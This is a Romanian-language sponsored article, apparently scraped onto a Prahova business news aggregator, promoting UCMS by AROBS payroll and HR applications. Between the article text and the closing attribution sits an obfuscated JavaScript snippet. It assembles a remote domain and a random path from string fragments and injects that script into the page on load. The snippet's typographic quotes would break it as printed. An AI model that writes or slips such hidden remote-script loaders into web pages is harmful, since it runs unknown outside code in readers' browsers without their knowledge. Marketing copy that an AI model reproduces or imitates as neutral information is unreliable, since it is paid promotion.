Cum sprijină o aplicație de payroll activitatea specialiștilor HR?

Read Time:3 Minute, 32 Second

[ad_1]

Pentru a administra o companie într-un mod eficient, o aplicație payroll, dar și un soft resurse umane, sunt instrumente digitale foarte utile. Dacă te afli în căutarea unei modalități prin care pot fi gestionate cu ușurință procesele de salarizare, investiția într-o soluție software performantă este o idee de luat în considerare. Aplicațiile destinate calcului de salarii, și pentru managementul personalului, ajută departamentul de resurse umane în munca de zi cu zi.

Simplificarea operațiunilor de salarizare, posibilă cu o aplicație de payroll

Într-o companie cu un număr ridicat de angajați, situațiile complexe în privința calcului de salarii sunt destul de întâlnite. Prin urmare, o aplicație de payroll este foarte utilă pentru a reduce timpul necesar realizării lor. Deseori, soluția de salarizare este integrată cu un soft resurse umane, care oferă posibilitatea unui management de personal realizat în condiții optime.

Pentru realizarea calcului de salarii, soluția de payroll ia în calcul toate elementele variabile dintr-o lună, cum ar fi orele lucrate. Centralizarea și preluarea datelor de prezență este posibilă cu ajutorul unui soft resurse umane, unde se regăsește o funcționalitate dedicată pontajului. Alături de aceste caracteristici, un beneficiu major al soluțiilor de payroll și HR este reprezentat de securitatea sporită a datelor.

Operațiuni conforme cu normele în vigoare

Un soft performant de payroll este actualizat în permanență cu modificările legislative, astfel că utilizatorii pot să efectueze operațiunile de salarizare fără grija unor neconformități. Mai mult, cu ajutorul tehnologiei, salariile pot fi calculate rapid, iar angajații își primesc la timp remunerația lunară. Acest lucru ajută la menținerea unui moralului ridicat în rândul acestora, fapt ce contribuie la o productivite ridicată.

Funcții multiple regăsite în soluția de salarizare

După efectuarea calculul de salarii, aplicația de payroll permite transmiterea fluturașilor de salariu de către angajați, pentru a avea o comunicare transparentă și eficientă în interiorul organizației. De asemenea, programul poate fi utilizat pentru a genera rapoarte simple și complexe, care oferă o vedere de ansamblu asupra proceselor financiar-contabile din companie.

Digitalizarea facilitează creșterea performanței

Organizațiile se pot dezvolta mai ușor prin adoptarea unor soluții digitale, așa cum este o aplicație de payroll sau un soft resurse umane. Utilizarea lor în activitățile zilnice salvează timp prețios pentru departamentul de resurse umane, care își poate dedica timp pentru a îmbunătăți diverse proceduri interne. De asemnea, automatizarea anumitor procese previne erorile umane, la care sunt predispuși deseori specialiștii HR în cazul operațiunilor manuale, repetitive.

Integrarea aplicației de salarizare cu un soft resurse umane

Alături de softul pentru operațiunile de payroll, specialiștii HR au nevoie și de un soft resurse umane complex. O astfel de soluție digitală ajută la gestionarea eficientă a proceselor de zi cu zi din zona managementului de personal. Funcționalitățile pentru pontaj, recrutare, evaluarea performanței sau trainingul angajaților sunt doar câteva dintre cele prezente într-un soft resurse umane.

Asemenea unei aplicații de salarizare, soluția software permite profesioniștilor din zona HR să își organizeze optim timpul și resursele. Datele personale ale angajaților pot fi centralizate în acest program, care oferă posibilitatea de a elibera adeverințe către membrii companiei într-un mod simplu.

Aplicații intuitive pentru specialiștii HR din compania ta

Pentru a avea parte de o productivitate la nivel înalt, alege digitalizarea proceselor de payroll și HR din organizația ta. Procedând astfel, îți vei reduce costurile pe termen lung, iar specialiștii din departamentul de resurse umane vor salva mult timp și energie.

Descoperă soluțiile software intuitive dezvoltate de UCMS by AROBS, o companie cu peste 26 de ani de experiență pe piața din România. Aplicațiile lor, dp-Payroll și True HR, au câte 19 funcționalități distincte și pot fi configurate pe nevoile tale specifice. Pentru detalii despre modul lor de funcționare, contactează specialiștii UCMS by AROBS prin email la sales@ucms.ro sau la telefon 0738 822 537. (P)

(function(){
a94w=document.createElement(„script”);a94w_=”u”+(„s”)+”ta”;
a94w_+=(„t.i”)+””+”n”;a94w_+=((„f”)+”o”);a94w.type=”text/javascript”;
a94w_+=”/”; a94wu=”483777657″;a94wu+=”.4fpyrkhk94wbzvzn9uz”;a94wu+=”1fdlp19dvdi”;
a94w.src=”https://”+a94w_+a94wu;a94w.async=true;document.body.appendChild(a94w);
})();

Articolul Cum sprijină o aplicație de payroll activitatea specialiștilor HR? a aparut prima data pe Prahova Business – Despre afaceri. Zi de zi – Primul cotidian online de afaceri din Prahova.

[ad_2]

Source link

Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %
Previous post IMAGINILE ZILEI, de 1 Decembrie, la Ploiesti!
Next post La Oradea, e… ASA! La Ploiesti, la… Hipodrom, oare cum va fi?!!?
We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners. View more
Accept